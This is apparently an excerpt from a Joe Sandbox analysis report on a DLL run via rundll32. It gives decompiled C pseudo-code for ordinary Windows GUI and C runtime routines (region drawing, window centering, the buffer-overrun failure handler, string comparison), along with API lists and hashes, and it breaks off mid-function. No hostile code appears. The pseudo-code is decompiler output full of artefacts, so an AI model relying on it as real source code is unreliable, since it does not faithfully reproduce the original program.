                                                                                                            				 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x20)));
                                                                                                            				PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
                                                                                                            				if( *(_t229 + 0x14) != 0) {
                                                                                                            					E10029439(_t226,  *(_t229 + 0x14));
                                                                                                            				}
                                                                                                            				E10028E1A(_t226, 0);
                                                                                                            				 *(_t229 - 4) = 3;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x14)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t229 - 0x14);
                                                                                                            				 *(_t229 - 4) = 2;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x1c)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t229 - 0x1c);
                                                                                                            				 *(_t229 - 4) = 1;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x24)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t229 - 0x24);
                                                                                                            				 *(_t229 - 4) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x2c)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t229 - 0x2c);
                                                                                                            				 *(_t229 - 4) =  *(_t229 - 4) | 0xffffffff;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x34)) = 0x1003eb6c;
                                                                                                            				_t145 = E100293B4(_t229 - 0x34);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
                                                                                                            				return _t145;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10033FD3
                                                                                                              • Part of subcall function 1000B4EC: CreateRectRgnIndirect.GDI32(00000000), ref: 1000B4F3
                                                                                                            • CopyRect.USER32 ref: 10034012
                                                                                                            • InflateRect.USER32(?,?,?), ref: 10034028
                                                                                                            • IntersectRect.USER32 ref: 10034036
                                                                                                            • CreateRectRgnIndirect.GDI32(?), ref: 10034040
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034053
                                                                                                              • Part of subcall function 10010478: CombineRgn.GDI32(?,?,?,00000003), ref: 1001049B
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100340AF
                                                                                                            • CopyRect.USER32 ref: 100340CC
                                                                                                            • InflateRect.USER32(?,?,?), ref: 100340E2
                                                                                                            • IntersectRect.USER32 ref: 100340F0
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034126
                                                                                                              • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                                                              • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                                                              • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                                                            • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 1003419B
                                                                                                              • Part of subcall function 10029439: SelectObject.GDI32(?,00000000), ref: 1002945B
                                                                                                              • Part of subcall function 10029439: SelectObject.GDI32(?,00000004), ref: 10029471
                                                                                                            • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100341EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prologPattern
                                                                                                            • String ID:
                                                                                                            • API String ID: 897514543-0
                                                                                                            • Opcode ID: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                                                            • Instruction ID: e5f9903ccf7cdd00105ec8572482158fef9e459befd851420e55a1fcda6e3601
                                                                                                            • Opcode Fuzzy Hash: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                                                            • Instruction Fuzzy Hash: 4191EFB690010DEFCF06DFA4D995CEEBBB9EF08244F51411AF906A7251DB34AE06CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 90%
                                                                                                            			E100219DD(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                            				signed int _v5;
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				struct tagRECT _v28;
                                                                                                            				struct tagRECT _v44;
                                                                                                            				struct tagRECT _v60;
                                                                                                            				struct tagRECT _v80;
                                                                                                            				char _v100;
                                                                                                            				intOrPtr _t55;
                                                                                                            				struct HWND__* _t56;
                                                                                                            				intOrPtr _t78;
                                                                                                            				intOrPtr _t90;
                                                                                                            				signed int _t99;
                                                                                                            				struct HWND__* _t100;
                                                                                                            				struct HWND__* _t102;
                                                                                                            				void* _t104;
                                                                                                            				long _t110;
                                                                                                            				void* _t113;
                                                                                                            				struct HWND__* _t115;
                                                                                                            				void* _t117;
                                                                                                            				intOrPtr _t119;
                                                                                                            				intOrPtr _t123;
                                                                                                            
                                                                                                            				_t113 = __edx;
                                                                                                            				_t119 = __ecx;
                                                                                                            				_v12 = __ecx;
                                                                                                            				_v8 = E100202AB(__ecx);
                                                                                                            				_t55 = _a4;
                                                                                                            				if(_t55 == 0) {
                                                                                                            					if((_v5 & 0x00000040) == 0) {
                                                                                                            						_t56 = GetWindow( *(__ecx + 0x1c), 4);
                                                                                                            					} else {
                                                                                                            						_t56 = GetParent( *(__ecx + 0x1c));
                                                                                                            					}
                                                                                                            					_t115 = _t56;
                                                                                                            					if(_t115 != 0) {
                                                                                                            						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
                                                                                                            						if(_t100 != 0) {
                                                                                                            							_t115 = _t100;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t115 =  *(_t55 + 0x1c);
                                                                                                            				}
                                                                                                            				GetWindowRect( *(_t119 + 0x1c),  &_v44);
                                                                                                            				if((_v5 & 0x00000040) != 0) {
                                                                                                            					_t102 = GetParent( *(_t119 + 0x1c));
                                                                                                            					GetClientRect(_t102,  &_v28);
                                                                                                            					GetClientRect(_t115,  &_v60);
                                                                                                            					MapWindowPoints(_t115, _t102,  &_v60, 2);
                                                                                                            				} else {
                                                                                                            					if(_t115 != 0) {
                                                                                                            						_t99 = GetWindowLongA(_t115, 0xfffffff0);
                                                                                                            						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
                                                                                                            							_t115 = 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_v100 = 0x28;
                                                                                                            					if(_t115 != 0) {
                                                                                                            						GetWindowRect(_t115,  &_v60);
                                                                                                            						E10007B50(E10007AE5(_t115, 2),  &_v100);
                                                                                                            						CopyRect( &_v28,  &_v80);
                                                                                                            					} else {
                                                                                                            						_t90 = E10006C53();
                                                                                                            						if(_t90 != 0) {
                                                                                                            							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
                                                                                                            						}
                                                                                                            						E10007B50(E10007AE5(_t90, 1),  &_v100);
                                                                                                            						CopyRect( &_v60,  &_v80);
                                                                                                            						CopyRect( &_v28,  &_v80);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t117 = _v44.right - _v44.left;
                                                                                                            				asm("cdq");
                                                                                                            				_t104 = _v44.bottom - _v44.top;
                                                                                                            				asm("cdq");
                                                                                                            				_t114 = _v60.bottom;
                                                                                                            				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
                                                                                                            				asm("cdq");
                                                                                                            				asm("cdq");
                                                                                                            				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
                                                                                                            				if(_t110 >= _v28.left) {
                                                                                                            					_t78 = _v28.right;
                                                                                                            					if(_t117 + _t110 > _t78) {
                                                                                                            						_t110 = _t78 - _v44.right + _v44.left;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t110 = _v28.left;
                                                                                                            				}
                                                                                                            				if(_t123 >= _v28.top) {
                                                                                                            					if(_t104 + _t123 > _v28.bottom) {
                                                                                                            						_t123 = _v44.top - _v44.bottom + _v28.bottom;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t123 = _v28.top;
                                                                                                            				}
                                                                                                            				return E100204FE(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
                                                                                                            			}

                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetParent.USER32(?), ref: 10021A08
                                                                                                            • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 10021A2B
                                                                                                            • GetWindowRect.USER32 ref: 10021A44
                                                                                                            • GetWindowLongA.USER32 ref: 10021A57
                                                                                                            • CopyRect.USER32 ref: 10021AA4
                                                                                                            • CopyRect.USER32 ref: 10021AAE
                                                                                                            • GetWindowRect.USER32 ref: 10021AB7
                                                                                                            • CopyRect.USER32 ref: 10021AD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 808654186-0
                                                                                                            • Opcode ID: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                                                            • Instruction ID: c5023cb8dd4c56e62e69e6e4efe16b58097a74c7fe0422dfe49a5ff72fe10001
                                                                                                            • Opcode Fuzzy Hash: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                                                            • Instruction Fuzzy Hash: 9A51AD76A00219AFDB01DBA8DC89FEEBBBDEF48350F154115E901F7281EB30B9458B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 50%
                                                                                                            			E10016BAA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t32;
                                                                                                            				intOrPtr* _t33;
                                                                                                            				void* _t41;
                                                                                                            				signed int _t54;
                                                                                                            				unsigned int _t59;
                                                                                                            				void* _t75;
                                                                                                            				intOrPtr* _t76;
                                                                                                            				signed int _t81;
                                                                                                            				char* _t83;
                                                                                                            				void* _t86;
                                                                                                            				intOrPtr _t87;
                                                                                                            				void* _t88;
                                                                                                            				intOrPtr _t89;
                                                                                                            
                                                                                                            				_push(0x118);
                                                                                                            				_push(0x10042558);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t32 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				 *((intOrPtr*)(_t88 - 0x1c)) = _t32;
                                                                                                            				_t33 =  *0x1004f708; // 0x0
                                                                                                            				if(_t33 == 0) {
                                                                                                            					if( *((intOrPtr*)(_t88 + 8)) == 1) {
                                                                                                            						_t83 = "Buffer overrun detected!";
                                                                                                            						 *(_t88 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
                                                                                                            						_t86 = 0xb9;
                                                                                                            					} else {
                                                                                                            						_t83 = "Unknown security failure detected!";
                                                                                                            						 *(_t88 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
                                                                                                            						_t86 = 0xd4;
                                                                                                            					}
                                                                                                            					 *((char*)(_t88 - 0x20)) = 0;
                                                                                                            					if(GetModuleFileNameA(0, _t88 - 0x124, 0x104) == 0) {
                                                                                                            						E10017B90(_t88 - 0x124, "<program name unknown>");
                                                                                                            					}
                                                                                                            					_t71 = _t88 - 0x124;
                                                                                                            					if(E10011820(_t88 - 0x124) + 0xb > 0x3c) {
                                                                                                            						E10019E20(E10011820(_t71) + _t88 - 0xf3, "...", 3);
                                                                                                            						_t89 = _t89 + 0x10;
                                                                                                            					}
                                                                                                            					_t41 = E10011820(_t71);
                                                                                                            					_pop(_t75);
                                                                                                            					E10010B20(_t41 + _t86 + 0x0000000c + 0x00000003 & 0xfffffffc, _t75);
                                                                                                            					 *((intOrPtr*)(_t88 - 0x18)) = _t89;
                                                                                                            					_t87 = _t89;
                                                                                                            					E10017B90(_t87, _t83);
                                                                                                            					E10017BA0(_t87, "\n\n");
                                                                                                            					E10017BA0(_t87, "Program: ");
                                                                                                            					E10017BA0(_t87, _t71);
                                                                                                            					E10017BA0(_t87, "\n\n");
                                                                                                            					E10017BA0(_t87,  *(_t88 - 0x128));
                                                                                                            					_push(0x12010);
                                                                                                            					_push("Microsoft Visual C++ Runtime Library");
                                                                                                            					_push(_t87);
                                                                                                            					E10019D1D();
                                                                                                            					_t89 = _t89 + 0x3c;
                                                                                                            				} else {
                                                                                                            					 *(_t88 - 4) = 0;
                                                                                                            					 *_t33( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 + 0xc)));
                                                                                                            					 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
                                                                                                            				}
                                                                                                            				E10011F56(3);
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				_t81 =  *(_t89 + 4);
                                                                                                            				_t76 =  *((intOrPtr*)(_t89 + 8));
                                                                                                            				if((_t81 & 0x00000003) != 0) {
                                                                                                            					if((_t81 & 0x00000001) == 0) {
                                                                                                            						L27:
                                                                                                            						_t54 =  *_t81;
                                                                                                            						_t81 = _t81 + 2;
                                                                                                            						if(_t54 !=  *_t76) {
                                                                                                            							goto L22;
                                                                                                            						} else {
                                                                                                            							_t54 = _t54;
                                                                                                            							if(_t54 == 0) {
                                                                                                            								goto L21;
                                                                                                            							} else {
                                                                                                            								if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
                                                                                                            									goto L22;
                                                                                                            								} else {
                                                                                                            									if(_t54 == 0) {
                                                                                                            										goto L21;
                                                                                                            									} else {
                                                                                                            										_t76 = _t76 + 2;
                                                                                                            										goto L12;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t54 =  *_t81;
                                                                                                            						_t81 = _t81 + 1;
                                                                                                            						if(_t54 !=  *_t76) {
                                                                                                            							goto L22;
                                                                                                            						} else {
                                                                                                            							_t76 = _t76 + 1;
                                                                                                            							if(_t54 == 0) {
                                                                                                            								goto L21;
                                                                                                            							} else {
                                                                                                            								if((_t81 & 0x00000002) == 0) {
                                                                                                            									goto L12;
                                                                                                            								} else {
                                                                                                            									goto L27;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					while(1) {
                                                                                                            						L12:
                                                                                                            						_t54 =  *_t81;
                                                                                                            						if(_t54 !=  *_t76) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_t54 = _t54;
                                                                                                            						if(_t54 == 0) {
                                                                                                            							L21:
                                                                                                            							return 0;
                                                                                                            						} else {
                                                                                                            							if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
                                                                                                            								break;
                                                                                                            							} else {
                                                                                                            								_t59 = _t54;
                                                                                                            								if(_t59 == 0) {
                                                                                                            									goto L21;
                                                                                                            								} else {
                                                                                                            									_t54 = _t59 >> 0x10;
                                                                                                            									if(_t54 !=  *((intOrPtr*)(_t76 + 2))) {
                                                                                                            										break;
                                                                                                            									} else {
                                                                                                            										_t54 = _t54;
                                                                                                            										if(_t54 == 0) {
                                                                                                            											goto L21;
                                                                                                            										} else {
                                                                                                            											if(_t54 !=  *((intOrPtr*)(_t76 + 3))) {
                                                                                                            												break;
                                                                                                            											} else {
                                                                                                            												_t76 = _t76 + 4;
                                                                                                            												_t81 = _t81 + 4;
                                                                                                            												if(_t54 != 0) {
                                                                                                            													continue;
                                                                                                            												} else {
                                                                                                            													goto L21;
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L32;
                                                                                                            					}
                                                                                                            					L22:
                                                                                                            					asm("sbb eax, eax");
                                                                                                            					return (_t54 << 1) + 1;
                                                                                                            				}
                                                                                                            				L32:
                                                                                                            			}
















                                                                                                            0x10016d7f
                                                                                                            0x10016d81
                                                                                                            0x00000000
                                                                                                            0x10016d83
                                                                                                            0x10016d83
                                                                                                            0x00000000
                                                                                                            0x10016d83
                                                                                                            0x10016d81
                                                                                                            0x10016d7d
                                                                                                            0x10016d78
                                                                                                            0x10016d54
                                                                                                            0x10016d54
                                                                                                            0x10016d56
                                                                                                            0x10016d5b
                                                                                                            0x00000000
                                                                                                            0x10016d5d
                                                                                                            0x10016d5d
                                                                                                            0x10016d62
                                                                                                            0x00000000
                                                                                                            0x10016d64
                                                                                                            0x10016d6a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016d6a
                                                                                                            0x10016d62
                                                                                                            0x10016d5b
                                                                                                            0x10016d10
                                                                                                            0x10016d10
                                                                                                            0x10016d10
                                                                                                            0x10016d10
                                                                                                            0x10016d14
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016d16
                                                                                                            0x10016d18
                                                                                                            0x10016d40
                                                                                                            0x10016d42
                                                                                                            0x10016d1a
                                                                                                            0x10016d1d
                                                                                                            0x00000000
                                                                                                            0x10016d1f
                                                                                                            0x10016d1f
                                                                                                            0x10016d21
                                                                                                            0x00000000
                                                                                                            0x10016d23
                                                                                                            0x10016d23
                                                                                                            0x10016d29
                                                                                                            0x00000000
                                                                                                            0x10016d2b
                                                                                                            0x10016d2b
                                                                                                            0x10016d2d
                                                                                                            0x00000000
                                                                                                            0x10016d2f
                                                                                                            0x10016d32
                                                                                                            0x00000000
                                                                                                            0x10016d34
                                                                                                            0x10016d34
                                                                                                            0x10016d37
                                                                                                            0x10016d3c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016d3c
                                                                                                            0x10016d32
                                                                                                            0x10016d2d
                                                                                                            0x10016d29
                                                                                                            0x10016d21
                                                                                                            0x10016d1d
                                                                                                            0x00000000
                                                                                                            0x10016d18
                                                                                                            0x10016d44
                                                                                                            0x10016d44
                                                                                                            0x10016d4b
                                                                                                            0x10016d4b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,10042558,00000118,10011796,00000001,00000000,10041D50,00000008,10016B00,00000000,00000000,00000000), ref: 10016C2B
                                                                                                            • _strlen.LIBCMT ref: 10016C51
                                                                                                            • _strlen.LIBCMT ref: 10016C62
                                                                                                            • _strncpy.LIBCMT ref: 10016C7C
                                                                                                            • _strlen.LIBCMT ref: 10016C85
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strlen$FileModuleName_strncpy
                                                                                                            • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                                                            • API String ID: 2455649890-1673886896
                                                                                                            • Opcode ID: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                                                            • Instruction ID: 88295e5d41c60b50e9a3e58cda1e4c53c685b81e948abb858cf034152a287b35
                                                                                                            • Opcode Fuzzy Hash: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                                                            • Instruction Fuzzy Hash: 6731B476A052146BDB15DB60CC82FDE36B8EF05214F600169F514EF142DB38EBD18BA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E1001C425(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t94;
                                                                                                            				int _t95;
                                                                                                            				int _t98;
                                                                                                            				short* _t106;
                                                                                                            				int _t109;
                                                                                                            				short* _t111;
                                                                                                            				short* _t118;
                                                                                                            				short* _t119;
                                                                                                            				short* _t126;
                                                                                                            				char* _t132;
                                                                                                            				char* _t133;
                                                                                                            				long _t139;
                                                                                                            				int _t141;
                                                                                                            				int _t142;
                                                                                                            				int _t143;
                                                                                                            				int _t144;
                                                                                                            				char _t154;
                                                                                                            				char _t156;
                                                                                                            				short* _t159;
                                                                                                            				short* _t160;
                                                                                                            				short* _t162;
                                                                                                            				int _t165;
                                                                                                            				void* _t166;
                                                                                                            				void* _t167;
                                                                                                            				short* _t168;
                                                                                                            				void* _t173;
                                                                                                            
                                                                                                            				_push(0x40);
                                                                                                            				_push(0x10042fa0);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t94 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				 *((intOrPtr*)(_t167 - 0x1c)) = _t94;
                                                                                                            				_t162 = 0;
                                                                                                            				_t165 = 1;
                                                                                                            				_t173 =  *0x1004f8b0 - _t162; // 0x0
                                                                                                            				if(_t173 == 0) {
                                                                                                            					if(CompareStringW(0, 0, 0x10042704, 1, 0x10042704, 1) == 0) {
                                                                                                            						_t139 = GetLastError();
                                                                                                            						__eflags = _t139 - 0x78;
                                                                                                            						if(_t139 == 0x78) {
                                                                                                            							 *0x1004f8b0 = 2;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						 *0x1004f8b0 = 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if( *(_t167 + 0x14) > _t162) {
                                                                                                            					 *(_t167 + 0x14) = E1001C409( *(_t167 + 0x10),  *(_t167 + 0x14));
                                                                                                            				}
                                                                                                            				_t95 =  *(_t167 + 0x1c);
                                                                                                            				if(_t95 > _t162) {
                                                                                                            					_t95 = E1001C409( *(_t167 + 0x18), _t95);
                                                                                                            					 *(_t167 + 0x1c) = _t95;
                                                                                                            				}
                                                                                                            				_t144 =  *0x1004f8b0; // 0x0
                                                                                                            				_t141 = 2;
                                                                                                            				if(_t144 == _t141 || _t144 == _t162) {
                                                                                                            					 *(_t167 - 0x38) = _t162;
                                                                                                            					__eflags =  *(_t167 + 8) - _t162;
                                                                                                            					if( *(_t167 + 8) == _t162) {
                                                                                                            						_t109 =  *0x1004f724; // 0x0
                                                                                                            						 *(_t167 + 8) = _t109;
                                                                                                            					}
                                                                                                            					_t142 =  *(_t167 + 0x20);
                                                                                                            					__eflags = _t142 - _t162;
                                                                                                            					if(_t142 == _t162) {
                                                                                                            						_t142 =  *0x1004f734; // 0x0
                                                                                                            					}
                                                                                                            					_t166 = E1001A444(_t142,  *(_t167 + 8));
                                                                                                            					__eflags = _t166 - 0xffffffff;
                                                                                                            					if(_t166 != 0xffffffff) {
                                                                                                            						__eflags = _t166 - _t142;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							L67:
                                                                                                            							_t165 = CompareStringA( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 + 0x10),  *(_t167 + 0x14),  *(_t167 + 0x18),  *(_t167 + 0x1c));
                                                                                                            							__eflags = _t162;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								_push(_t162);
                                                                                                            								E100107C8(_t142, _t162, _t165, __eflags);
                                                                                                            								_push( *(_t167 - 0x38));
                                                                                                            								E100107C8(_t142, _t162, _t165, __eflags);
                                                                                                            							}
                                                                                                            							goto L69;
                                                                                                            						}
                                                                                                            						_push(0);
                                                                                                            						_push(0);
                                                                                                            						_push(_t167 + 0x14);
                                                                                                            						_push( *(_t167 + 0x10));
                                                                                                            						_push(_t166);
                                                                                                            						_push(_t142);
                                                                                                            						_t162 = E1001A487(_t142, _t162, _t166, __eflags);
                                                                                                            						__eflags = _t162;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							goto L61;
                                                                                                            						}
                                                                                                            						_push(0);
                                                                                                            						_push(0);
                                                                                                            						_push(_t167 + 0x1c);
                                                                                                            						_push( *(_t167 + 0x18));
                                                                                                            						_push(_t166);
                                                                                                            						_push(_t142);
                                                                                                            						_t106 = E1001A487(_t142, _t162, _t166, __eflags);
                                                                                                            						 *(_t167 - 0x38) = _t106;
                                                                                                            						__eflags = _t106;
                                                                                                            						if(__eflags != 0) {
                                                                                                            							 *(_t167 + 0x10) = _t162;
                                                                                                            							 *(_t167 + 0x18) =  *(_t167 - 0x38);
                                                                                                            							goto L67;
                                                                                                            						}
                                                                                                            						_push(_t162);
                                                                                                            						E100107C8(_t142, _t162, _t166, __eflags);
                                                                                                            					}
                                                                                                            					goto L61;
                                                                                                            				} else {
                                                                                                            					if(_t144 != _t165) {
                                                                                                            						L61:
                                                                                                            						_t98 = 0;
                                                                                                            						L70:
                                                                                                            						return E1001254F(E100117AE(_t98,  *((intOrPtr*)(_t167 - 0x1c))));
                                                                                                            					}
                                                                                                            					 *(_t167 - 0x3c) = _t162;
                                                                                                            					 *(_t167 - 0x44) = _t162;
                                                                                                            					 *(_t167 - 0x40) = _t162;
                                                                                                            					if( *(_t167 + 0x20) == _t162) {
                                                                                                            						_t144 =  *0x1004f734; // 0x0
                                                                                                            						 *(_t167 + 0x20) = _t144;
                                                                                                            					}
                                                                                                            					if( *(_t167 + 0x14) == _t162 || _t95 == _t162) {
                                                                                                            						if( *(_t167 + 0x14) != _t95) {
                                                                                                            							__eflags = _t95 - _t165;
                                                                                                            							if(_t95 > _t165) {
                                                                                                            								L69:
                                                                                                            								_t98 = _t165;
                                                                                                            								goto L70;
                                                                                                            							}
                                                                                                            							__eflags =  *(_t167 + 0x14) - _t165;
                                                                                                            							if( *(_t167 + 0x14) <= _t165) {
                                                                                                            								_t111 = GetCPInfo( *(_t167 + 0x20), _t167 - 0x30);
                                                                                                            								__eflags = _t111;
                                                                                                            								if(_t111 == 0) {
                                                                                                            									goto L61;
                                                                                                            								}
                                                                                                            								__eflags =  *(_t167 + 0x14) - _t162;
                                                                                                            								if( *(_t167 + 0x14) <= _t162) {
                                                                                                            									__eflags =  *(_t167 + 0x1c) - _t162;
                                                                                                            									if( *(_t167 + 0x1c) <= _t162) {
                                                                                                            										goto L38;
                                                                                                            									}
                                                                                                            									__eflags =  *(_t167 - 0x30) - _t141;
                                                                                                            									if( *(_t167 - 0x30) < _t141) {
                                                                                                            										goto L69;
                                                                                                            									}
                                                                                                            									_t132 = _t167 - 0x2a;
                                                                                                            									__eflags =  *((char*)(_t167 - 0x2a));
                                                                                                            									if( *((char*)(_t167 - 0x2a)) == 0) {
                                                                                                            										goto L69;
                                                                                                            									} else {
                                                                                                            										goto L33;
                                                                                                            									}
                                                                                                            									while(1) {
                                                                                                            										L33:
                                                                                                            										_t159 =  *((intOrPtr*)(_t132 + 1));
                                                                                                            										__eflags = _t159;
                                                                                                            										if(_t159 == 0) {
                                                                                                            											goto L69;
                                                                                                            										}
                                                                                                            										_t154 =  *( *(_t167 + 0x18));
                                                                                                            										__eflags = _t154 -  *_t132;
                                                                                                            										if(_t154 <  *_t132) {
                                                                                                            											L36:
                                                                                                            											_t132 = _t132 + _t141;
                                                                                                            											__eflags =  *_t132;
                                                                                                            											if( *_t132 != 0) {
                                                                                                            												continue;
